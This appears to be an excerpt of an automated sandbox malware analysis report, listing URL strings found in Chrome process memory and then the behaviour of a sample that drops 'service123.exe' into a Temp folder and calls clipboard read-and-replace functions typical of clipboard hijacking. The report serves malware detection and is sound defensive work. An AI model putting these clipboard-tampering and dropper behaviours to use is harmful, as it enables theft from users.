Source: chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapplt
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406055316.00002854006E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405716206.0000285400638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/amp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000003.00000002.2409293507.0000285400D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/~
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000003.00000003.2373821273.000005FC0087C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
Source: chrome.exe, 00000003.00000002.2401589904.000005FC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000003.00000002.2406782033.00002854007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000003.00000002.2406782033.00002854007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000003.00000002.2406782033.00002854007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000003.00000002.2404100505.000028540010C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408327631.0000285400AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000002.2409641422.0000285400E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000003.00000002.2409641422.0000285400E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404679282.00002854002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408327631.0000285400AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000002.2409641422.0000285400E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000003.00000002.2408113593.0000285400A50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000002.2404100505.000028540010C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000003.00000002.2406648522.0000285400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2380718468.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405005873.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383596431.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381745231.0000285400454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000003.00000003.2381440086.0000285400CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000003.00000002.2406977156.0000285400828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/CharPk3
Source: chrome.exe, 00000003.00000002.2407736913.0000285400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406977156.0000285400828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000003.00000002.2407736913.0000285400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406977156.0000285400828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000003.00000002.2404124074.000028540011C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000003.00000002.2405651008.000028540060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408633079.0000285400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000003.00000002.2404545133.00002854002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000003.00000002.2408028126.0000285400A20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405607685.00002854005F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.2408941027.0000285400C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcap
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q
Source: chrome.exe, 00000003.00000002.2404071818.00002854000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C1F9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C1F9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_6C1F9E27

System Summary

Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B351B0 7_2_00B351B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B33E20 7_2_00B33E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C222CCE 7_2_6C222CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1ECD00 7_2_6C1ECD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1EEE50 7_2_6C1EEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F0FC0 7_2_6C1F0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230AC0 7_2_6C230AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F44F0 7_2_6C1F44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2246E0 7_2_6C2246E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2187C0 7_2_6C2187C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2207D0 7_2_6C2207D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230060 7_2_6C230060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C222090 7_2_6C222090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C212360 7_2_6C212360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C23DC70 7_2_6C23DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F5880 7_2_6C1F5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2198F0 7_2_6C2198F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C227A20 7_2_6C227A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22DBEE 7_2_6C22DBEE
